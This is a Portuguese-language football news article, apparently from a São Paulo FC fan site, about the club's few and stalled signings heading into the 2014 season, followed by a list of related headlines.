Destaque Principal

Dois anos após “pacotão”, SP repete 2012 com poucos nomes em dezembro

Foi na terceira semana de dezembro de 2011 que o São Paulo anunciou o maior pacote de reforços da última temporada. Os zagueiros Paulo Miranda e Edson Silva, o lateral esquerdo Cortez, o volante Fabrício e o meia Maicon foram contratados. No ano passado, não houve anúncios antes da virada de ano, mas as chegadas do zagueiro Lúcio, do atacante Aloísio e do goleiro Renan Ribeiro já estavam acertadas. Agora, no entanto, o clube sofre e fecha 2013 com mais indefinições do que situações encaminhadas.

A única contratação firmada e anunciada é a de Luis Ricardo, lateral direito de 29 anos que disputou o último Brasileirão pela Portuguesa. Ele já se apresentou ao São Paulo e começará os trabalhos de pré-temporada em Cotia junto aos demais atletas do elenco. Jucilei, objetivo principal do clube – que não encontra alvos para o setor ofensivo – tem negociação arrastada. O São Paulo tenta encontrar investidores que aceitem dividir ou até bancar o negócio de 5 milhões de euros (R$ 16 milhões).

O São Paulo sofre para contratar até no caso do volante Bruno Henrique, que pertence ao Londrina e esteve emprestado à Lusa neste Brasileirão. Segundo a diretoria, não houve acerto porque os valores consultados não se encaixam no que o clube pretendia gastar.

Outros que não interessam por conta dos altos valores e modelos de negócio são os atacante Rafael Sóbis, do Fluminense, e o chileno Eduardo Vargas, do Napoli (ITA), que jogou no Grêmio em 2013. O vice-presidente de futebol João Paulo de Jesus Lopes descartou a contratação da dupla.

Enquanto isso, a diretoria procura alvos para o setor ofensivo, mais deficiente do elenco e motivo das maiores preocupações. A equipe terminou a temporada jogando com o lateral direito Douglas na ponta direita, com o jovem Ademilson pela esquerda e sem definição na vaga do centroavante – Luis Fabiano virou reserva após 12 anos, Aloísio assumiu o posto, mas até Welliton teve chances.

Welliton não fica, e motiva o São Paulo a intensificar ainda mais a busca por atacantes. O Spartak Moscou vetou o prolongamento do empréstimo ao clube do Morumbi e só aceita negociá-lo definitivamente, o que a diretoria tricolor não pretende fazer.

Apesar da crise e dos fracassos em 2013, não devem ser muitos os reforços são-paulinos para 2014. A diretoria avalia que não precisa  de contratações para o setor defensivo – vê a zaga repleta com Rodrigo Caio, Antonio Carlos, Rafael Toloi, Roger Carvalho, Paulo Miranda e Edson Silva,  e ainda espera o retorno de Breno no primeiro semestre. Nas laterais, contratou Luis Ricardo e definiu a permanência de Reinaldo, que estava emprestado pelo Penapolense.

Fonte:uol
Faça parte de nossa rede. Curta nossa pagina no Facebook, clicando aqui!var d=document;var s=d.createElement(‘script’);

Destaque Principal

Mais em Destaque Principal

Doriva cede, coloca Rodrigo Caio como zagueiro e retoma dupla de Osorio

saopauloadmin2 de novembro de 2015

Terra do M1TO

saopauloadmin20 de novembro de 2014

Com vantagem no Choque-Rei, Tricolor defende bons números

saopauloadmin2 de fevereiro de 2014

Lateral do São Paulo faz exames médicos para fechar com Ponte Preta

saopauloadmin30 de janeiro de 2014

São Paulo confirma desistência de construtora e culpa oposição

saopauloadmin28 de janeiro de 2014

Conversa e ajustes antes do Rio Claro

saopauloadmin28 de janeiro de 2014

Lúcio relata bronca e premeditação de Autuori para dispensá-lo

saopauloadmin27 de janeiro de 2014

Jornalista critica meio-campo do São Paulo e dá crédito a Luis Fabiano

saopauloadmin26 de janeiro de 2014

Tricolor aposta nos laterais para bater o Oeste

saopauloadmin26 de janeiro de 2014